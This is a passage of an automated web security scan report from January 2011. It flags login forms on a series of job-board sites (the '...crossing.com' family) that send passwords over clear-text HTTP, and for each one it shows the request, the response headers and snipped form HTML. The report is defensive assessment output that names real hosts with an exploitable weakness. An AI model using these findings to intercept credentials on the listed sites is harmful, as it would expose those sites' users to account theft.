Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:12 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 106106

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.100kcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.2. http://www.accountingcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accountingcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.accountingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:13 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=m8i6cd531h6rsd383n5t999356; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:14 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 116767

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.accountingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.3. http://www.accountmanagementcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accountmanagementcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.accountmanagementcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:14 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=bvhhpa1stegtb9iluknr76tt84; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:14 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:14 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 137270

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.accountmanagementcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.4. http://www.actuarialcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.actuarialcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.actuarialcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:22 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=gfsjuvk6a0eja28o52r05s3445; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:22 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:22 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 114356

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.actuarialcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.5. http://www.admincrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.admincrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.admincrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:29 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=9hecq37ajcfirr9ve90dobkne6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:29 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109804

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.admincrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.6. http://www.advertisingcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.advertisingcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.advertisingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:29 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=4vstlithvj0cev5m57soav4bi3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:29 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:29 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 121935

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.advertisingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.7. http://www.aerospacecrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aerospacecrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.aerospacecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:33 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=smekqvtb2jtrk9a1sqbg5kk4u3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:33 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:33 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109477

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.aerospacecrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.8. http://www.agriculturalcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.agriculturalcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.agriculturalcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:34 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ukabttsk8nejv6h58lpcqprfk1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:34 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:34 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 102618

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.agriculturalcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.9. http://www.architecturecrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.architecturecrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.architecturecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:50 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=u8cdprgtig27p3jst5fgnvcol0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:51 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 125304

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.architecturecrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.10. http://www.attorneyresume.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.attorneyresume.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.attorneyresume.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:34:24 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=3oi3tsj2agglmdtggh0p0r2jo5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 80394

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<link rel="SHORTCUT ICON" href="http://www.attorneyresume.com/faviconar.ico">
<titl
...[SNIP]...
</script>
                            <form name="formmainlogin" action="" method="POST" onsubmit="return LoginFrm()" style="margin:0px; padding:0px;">
           <input type=hidden name="clslogin_hdnaction" id="clslogin_hdnaction" value="">
...[SNIP]...
<input type="text" name="clslogin_email" onfocus="focusval(this.value,'Email')" onblur="blurval('Email')" value="Email" size="12" class="input" maxlength="50">&nbsp;<input type="password" name="clslogin_password" onfocus="focusval(this.value,'Password')" onblur="blurval('Password')" value="Password" size="12" class="input" maxlength="16">&nbsp;<input type="image" src="http://www.attorneyresume.com/images/bt_login.gif" width="49" height="16" border="0" alt="Log In" align="absmiddle">
...[SNIP]...

6.11. http://www.auditorcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.auditorcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.auditorcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:52 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=16al60hefdulh9nl41fvb7adh1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:52 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:52 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 125427

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.auditorcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.12. http://www.automotivecrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.automotivecrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.automotivecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:56 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=chphkc8gns7vn2rq112ej1g8s5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:56 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:56 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109012

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.automotivecrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.13. http://www.aviationcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aviationcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.aviationcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:22:03 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=5ito8gdqrme71tdpjpbd47goi6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:22:03 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 123144

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.aviationcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
